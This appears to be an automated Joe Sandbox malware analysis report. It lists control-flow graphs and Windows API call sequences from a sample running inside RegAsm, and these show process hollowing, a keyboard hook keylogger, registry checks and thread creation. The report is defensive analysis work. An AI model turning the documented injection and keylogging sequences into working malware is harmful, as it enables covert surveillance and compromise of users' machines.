                                                                                  control_flow_graph 448 41812a-418153 449 418157-4181be GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 448->449 450 4181c4-4181cb 449->450 451 4184bb 449->451 450->451 453 4181d1-4181d8 450->453 452 4184bd-4184c7 451->452 453->451 454 4181de-4181e0 453->454 454->451 455 4181e6-418213 call 436f10 * 2 454->455 455->451 460 418219-418224 455->460 460->451 461 41822a-41825a CreateProcessW 460->461 462 418260-418288 VirtualAlloc Wow64GetThreadContext 461->462 463 4184b5 GetLastError 461->463 464 41847f-4184b3 VirtualFree GetCurrentProcess NtUnmapViewOfSection NtClose TerminateProcess 462->464 465 41828e-4182ae ReadProcessMemory 462->465 463->451 464->451 465->464 466 4182b4-4182d6 NtCreateSection 465->466 466->464 467 4182dc-4182e9 466->467 468 4182eb-4182f6 NtUnmapViewOfSection 467->468 469 4182fc-41831e NtMapViewOfSection 467->469 468->469 470 418320-41835d VirtualFree NtClose TerminateProcess 469->470 471 418368-41838f GetCurrentProcess NtMapViewOfSection 469->471 470->449 472 418363 470->472 471->464 473 418395-418399 471->473 472->451 474 4183a2-4183c0 call 436990 473->474 475 41839b-41839f 473->475 478 418402-41840b 474->478 479 4183c2-4183d0 474->479 475->474 480 41842b-41842f 478->480 481 41840d-418413 478->481 482 4183d2-4183f5 call 436990 479->482 484 418431-41844e WriteProcessMemory 480->484 485 418454-41846b Wow64SetThreadContext 480->485 481->480 483 418415-418428 call 41853e 481->483 491 4183f7-4183fe 482->491 483->480 484->464 489 418450 484->489 485->464 490 41846d-418479 ResumeThread 485->490 489->485 490->464 493 41847b-41847d 490->493 491->478 493->452
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 00418280
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
                                                                                  • NtUnmapViewOfSection.NTDLL(?,?), ref: 004182F6
                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00418328
                                                                                  • NtClose.NTDLL(?), ref: 00418332
                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 0041833C
                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041837C
                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00418463
                                                                                  • ResumeThread.KERNEL32(?), ref: 00418470
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00418487
                                                                                  • GetCurrentProcess.KERNEL32(?), ref: 00418492
                                                                                  • NtUnmapViewOfSection.NTDLL(00000000), ref: 00418499
                                                                                  • NtClose.NTDLL(?), ref: 004184A3
                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004184AD
                                                                                  • GetLastError.KERNEL32 ref: 004184B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
                                                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                  • API String ID: 3150337530-3035715614
                                                                                  • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                  • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                  • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                  • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1638 40a2f3-40a30a 1639 40a30c-40a326 GetModuleHandleA SetWindowsHookExA 1638->1639 1640 40a36e-40a37e GetMessageA 1638->1640 1639->1640 1643 40a328-40a36c GetLastError call 41bc1f call 4052fd call 402093 call 41b580 call 401fd8 1639->1643 1641 40a380-40a398 TranslateMessage DispatchMessageA 1640->1641 1642 40a39a 1640->1642 1641->1640 1641->1642 1644 40a39c-40a3a1 1642->1644 1643->1644
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                                                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                                                                  • GetLastError.KERNEL32 ref: 0040A328
                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                                                                  • TranslateMessage.USER32(?), ref: 0040A385
                                                                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                                                                  Strings
                                                                                  • Keylogger initialization failure: error , xrefs: 0040A33C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                  • String ID: Keylogger initialization failure: error
                                                                                  • API String ID: 3219506041-952744263
                                                                                  • Opcode ID: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                  • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                                                                  • Opcode Fuzzy Hash: 0dc1c2640651d2c5fe804fd6a671654dad06f326112922524979b06ffad0e6ec
                                                                                  • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1655 100010f1-10001166 call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW 1662 10001177-1000119e lstrlenW FindFirstFileW 1655->1662 1663 10001168-10001172 lstrlenW 1655->1663 1664 100011a0-100011a8 1662->1664 1665 100011e1-100011e9 1662->1665 1663->1662 1666 100011c7-100011d8 FindNextFileW 1664->1666 1667 100011aa-100011c4 call 10001000 1664->1667 1666->1664 1669 100011da-100011db FindClose 1666->1669 1667->1666 1669->1665
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001151
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                  • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 100011D0
                                                                                  • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4546320120.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4546280163.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4546320120.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                  • String ID:
                                                                                  • API String ID: 1083526818-0
                                                                                  • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                  • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                  • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                  • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                  APIs
                                                                                    • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                  • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                  • GetNativeSystemInfo.KERNEL32(?,0040D2DD,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411DE0
                                                                                  • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                    • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                  • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                  • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                    • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                    • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3950776272-0
                                                                                  • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                  • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                  • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                  • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                  APIs
                                                                                    • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                    • Part of subcall function 00413584: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
                                                                                    • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                  • ExitProcess.KERNEL32 ref: 0040F905
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                  • String ID: 5.1.3 Pro$override$pth_unenc
                                                                                  • API String ID: 2281282204-1392497409
                                                                                  • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                  • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                                                                  APIs
                                                                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404F81
                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415D11,?,00000001), ref: 00404FCD
                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                  Strings
                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                  • API String ID: 2532271599-1507639952
                                                                                  • Opcode ID: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                  • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                  • Opcode Fuzzy Hash: 7014718608cfeb48bfe47f339cac9c5a9a17279d6e1db9155cd03e2f3c9ced1b
                                                                                  • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                  APIs
                                                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00A801C8), ref: 004338DA
                                                                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Crypt$Context$AcquireRandomRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1815803762-0
                                                                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                  • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                  • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                  APIs
                                                                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B6BB
                                                                                  • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Name$ComputerUser
                                                                                  • String ID:
                                                                                  • API String ID: 4229901323-0
                                                                                  • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                  • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                  • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                  • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                  APIs
                                                                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.3 Pro), ref: 0040F920
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.4541258966.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2299586839-0
                                                                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 5 40ea00-40ea82 call 41cbe1 GetModuleFileNameW call 40f3fe call 4020f6 * 2 call 41beac call 40fb52 call 401e8d call 43fd50 22 40ea84-40eac9 call 40fbee call 401e65 call 401fab call 410f72 call 40fb9f call 40f3eb 5->22 23 40eace-40eb96 call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->23 49 40ef2d-40ef3e call 401fd8 22->49 69 40eb98-40ebe3 call 406c59 call 401fe2 call 401fd8 call 401fab call 413584 23->69 70 40ebe9-40ec04 call 401e65 call 40b9f8 23->70 69->70 100 40f38a-40f3a5 call 401fab call 4139e4 call 4124b0 69->100 79 40ec06-40ec25 call 401fab call 413584 70->79 80 40ec3e-40ec45 call 40d0a4 70->80 79->80 99 40ec27-40ec3d call 401fab call 4139e4 79->99 89 40ec47-40ec49 80->89 90 40ec4e-40ec55 80->90 93 40ef2c 89->93 94 40ec57 90->94 95 40ec59-40ec65 call 41b354 90->95 93->49 94->95 105 40ec67-40ec69 95->105 106 40ec6e-40ec72 95->106 99->80 126 40f3aa-40f3db call 41bcef call 401f04 call 413a5e call 401f09 * 2 100->126 105->106 108 40ecb1-40ecc4 call 401e65 call 401fab 106->108 109 40ec74 call 407751 106->109 127 40ecc6 call 407790 108->127 128 40eccb-40ed53 call 401e65 call 41bcef call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->128 117 40ec79-40ec7b 109->117 120 40ec87-40ec9a call 401e65 call 401fab 117->120 121 40ec7d-40ec82 call 407773 call 40729b 117->121 120->108 141 40ec9c-40eca2 120->141 121->120 157 40f3e0-40f3ea call 40dd7d call 414f65 126->157 127->128 177 40ed55-40ed6e call 401e65 call 401fab call 43bb56 128->177 178 40edbb-40edbf 128->178 141->108 144 40eca4-40ecaa 141->144 144->108 148 40ecac call 40729b 144->148 148->108 177->178 204 40ed70-40edb6 call 401e65 call 401fab call 401e65 call 401fab call 40da6f call 401f13 call 401f09 177->204 180 40ef41-40efa1 call 436f10 call 40247c call 401fab * 2 call 413733 call 409092 178->180 181 40edc5-40edcc 178->181 234 40efa6-40effa call 401e65 call 401fab call 402093 call 401fab call 4137aa call 401e65 call 401fab call 43bb2c 180->234 183 40ee4a-40ee54 call 409092 181->183 184 40edce-40ee48 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40ce34 181->184 190 40ee59-40ee7d call 40247c call 434829 183->190 184->190 212 40ee8c 190->212 213 40ee7f-40ee8a call 436f10 190->213 204->178 218 40ee8e-40eed9 call 401f04 call 43f859 call 40247c call 401fab call 40247c call 401fab call 413982 212->218 213->218 272 40eede-40ef03 call 434832 call 401e65 call 40b9f8 218->272 287 40f017-40f019 234->287 288 40effc 234->288 272->234 286 40ef09-40ef28 call 401e65 call 41bcef call 40f4af 272->286 286->234 306 40ef2a 286->306 291 40f01b-40f01d 287->291 292 40f01f 287->292 290 40effe-40f015 call 41ce2c CreateThread 288->290 293 40f025-40f101 call 402093 * 2 call 41b580 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409e1f call 401e65 call 401fab 290->293 291->290 292->293 344 40f103-40f13a call 43455e call 401e65 call 401fab CreateThread 293->344 345 40f13c 293->345 306->93 346 40f13e-40f156 call 401e65 call 401fab 344->346 345->346 357 40f194-40f1a7 call 401e65 call 401fab 346->357 358 40f158-40f18f call 43455e call 401e65 call 401fab CreateThread 346->358 367 40f207-40f21a call 401e65 call 401fab 357->367 368 40f1a9-40f202 call 401e65 call 401fab call 401e65 call 401fab call 40da23 call 401f13 call 401f09 CreateThread 357->368 358->357 379 40f255-40f279 call 41b69e call 401f13 call 401f09 367->379 380 40f21c-40f250 call 401e65 call 401fab call 401e65 call 401fab call 43bb2c call 40c19d 367->380 368->367 402 40f27b-40f27c SetProcessDEPPolicy 379->402 403 40f27e-40f291 CreateThread 379->403 380->379 402->403 406 40f293-40f29d CreateThread 403->406 407 40f29f-40f2a6 403->407 406->407 408 40f2b4-40f2bb 407->408 409 40f2a8-40f2b2 CreateThread 407->409 412 40f2c9 408->412 413 40f2bd-40f2c0 408->413 409->408 418 40f2ce-40f302 call 402093 call 4052fd call 402093 call 41b580 call 401fd8 412->418 415 40f2c2-40f2c7 413->415 416 40f307-40f31a call 401fab call 41353a 413->416 415->418 425 40f31f-40f322 416->425 418->416 425->157 427 40f328-40f368 call 41bcef call 401f04 call 413656 call 401f09 call 401f04 425->427 443 40f381-40f386 DeleteFileW 427->443 444 40f388 443->444 445 40f36a-40f36d 443->445 444->126 445->126 446 40f36f-40f37c Sleep call 401f04 445->446 446->443
                                                                                  APIs
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CBF6
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CBFF
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC19
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC2B
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC2E
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040EA1C), ref: 0041CC3F
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC42
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040EA1C), ref: 0041CC54
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC57
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040EA1C), ref: 0041CC63
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC66
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC7A
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CC8E
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040EA1C), ref: 0041CC9F
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCA2
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCB6
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCCA
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCDE
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CCF2
                                                                                    • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                    • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000), ref: 0041CD06
                                                                                    • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040EA1C), ref: 0041CD14
